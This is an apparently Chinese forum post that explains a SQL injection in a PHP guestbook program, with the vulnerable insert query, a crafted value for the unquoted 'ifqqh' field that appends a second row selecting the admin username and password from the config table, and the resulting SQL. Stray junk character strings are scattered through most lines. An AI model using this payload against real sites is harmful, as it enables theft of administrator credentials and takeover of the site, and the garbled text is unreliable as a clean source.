留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。, ~$ h `9 Q' D1 g
) T6 ]" Z$ R9 u/ q' P. j
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
$ l5 N7 b4 F. w- x3 t4 C4 @$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响' o% T' }5 O" O' c1 S! L& @ ?$ s c
6 h2 v& A9 h/ _8 D3 [. [提交的时候把ifqqh的值改一下。变成
9 d6 M! z4 {# I- e1 C: o5 p1 {4 P8 i# V3 N/ E' O) }4 B, H* O
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
: o0 g' U& M' c# i1 x2 [! j! K, e$ m2 p
这样SQL插入语句就变了.9 j# T4 W8 N W" G) J H0 |, @; c
7 }2 Y8 r" v; m" a2 K3 b
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)" q1 \6 y2 z& S" m' f- D
$ N$ b/ N5 h/ q5 ]" W1 q6 Y2 l' k
构造了另外一句SQL。并且把帐号密码读出来。
F* e4 `0 \0 v! L, w, w# A2 B
7 V: u: @4 ]. n m" g# W |
发表于 2013-2-19 08:10:11
收藏
支持
反对